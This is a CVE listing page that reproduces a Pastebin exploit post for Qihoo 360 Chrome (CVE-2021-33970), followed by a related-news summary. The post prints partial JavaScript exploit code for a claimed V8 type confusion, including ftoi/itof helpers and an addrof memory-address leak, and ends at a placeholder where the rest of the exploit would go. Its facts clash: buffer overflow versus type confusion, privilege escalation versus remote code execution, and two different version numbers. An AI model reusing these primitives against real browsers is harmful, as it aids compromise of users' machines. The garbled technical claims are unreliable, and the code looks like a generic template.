Headline
CVE-2021-33970: CVE-2021-33970 - Pastebin.com
Buffer Overflow vulnerability in Qihoo 360 Chrome v13.0.2170.0 allows attacker to escalate priveleges.
# Exploit Title: Qihoo 360 Chrome v12.0.1592.0 - RCE with Sandbox Escape
# Google Dork: N/A
# Date: 2021-05-11
# Exploit Author: youtube.com/@memorycorruptor
# Vendor Homepage: https://browser.360.cn/ee/
# Version: Qihoo 360 Chrome v13.0.2170.0
# Tested on: Windows x64 / Linux Debian x64 / MacOS
# CVE: CVE-2021-33970
# PoC Video: https://www.youtube.com/@memorycorruptor/videos
# Description: https://memorycorruptor.blogspot.com/p/vulnerabilities-disclosures.html
---------------------------------------------------------------------------
- Qihoo 360 Chrome v13.0.2170.0 is a web browser built on the Chrome engine, specifically using the V8 JavaScript engine. A recently discovered RCE vulnerability within this version allows attackers to execute arbitrary code on a victim’s computer remotely.
- The vulnerability exists in the V8 JavaScript engine, a critical component of Qihoo 360 Chrome v13.0.2170.0. It was discovered in 2021 and is a result of a type confusion issue. This issue occurs when the V8 engine improperly handles certain JavaScript objects, leading to memory corruption and potentially allowing an attacker to execute arbitrary code.
function trigger() {
let o = {a: 1};
let p = new Proxy(o, {});
p.__proto__ = {};
p.__proto__.x = 0;
let b = new ArrayBuffer(8);
let f64 = new Float64Array(b);
let u32 = new Uint32Array(b);
function ftoi(val) {
f64[0] = val;
return BigInt(u32[0]) + (BigInt(u32[1]) << 32n);
}
function itof(val) {
u32[0] = Number(val & 0xffffffffn);
u32[1] = Number(val >> 32n);
return f64[0];
}
function addrof(obj) {
o.a = obj;
return ftoi(p.x);
}
// Exploit code goes here
}
- trigger();
- This PoC code first sets up a type confusion situation in the V8 engine by creating a proxy object and modifying its __proto__ property. The addrof function then leaks the address of an object by causing the type confusion. The ftoi and itof functions are used to convert between floating-point and integer representations, which are essential for exploiting this vulnerability.
- The RCE vulnerability can allow an attacker to execute arbitrary code on the victim’s computer, potentially leading to data theft, unauthorized access, or other malicious actions. Users should update to the latest version of Qihoo 360 Chrome or an alternative browser to mitigate this vulnerability. Browser developers should apply patches to the V8 engine and ensure that proper handling of JavaScript objects is implemented to prevent such issues in the future.
- ---------------------------------------------------------------------------
Related news
Qihoo 360 (https://www.360.cn/) Qihoo 360 Safeguard (https://www.360.cn/) Qihoo 360 Chrome (https://browser.360.cn/ee/) is affected by: Buffer Overflow. The impact is: execute arbitrary code (remote). The component is: This is a set of vulnerabilities affecting popular software, and the installation packages correspond to versions "360 Safeguard(12.1.0.1004,12.1.0.1005,13.1.0.1001)" , "360 Total Security(10.8.0.1060,10.8.0.1213)", "360 Safe Browser & 360 Chrome(12. The attack vector is: On the browser vulnerability, just open a link to complete the vulnerability exploitation remotely; on the client software, you need to locally execute the vulnerability exploitation program, which of course can be achieved with the full chain of browser vulnerability. ¶¶ This is a set of the most serious vulnerabilities that exist on Qihoo 360's PC client multiple popular software, remote vulnerabilities can be accomplished by opening a link to arbitrary code execution on both security browsers, in con...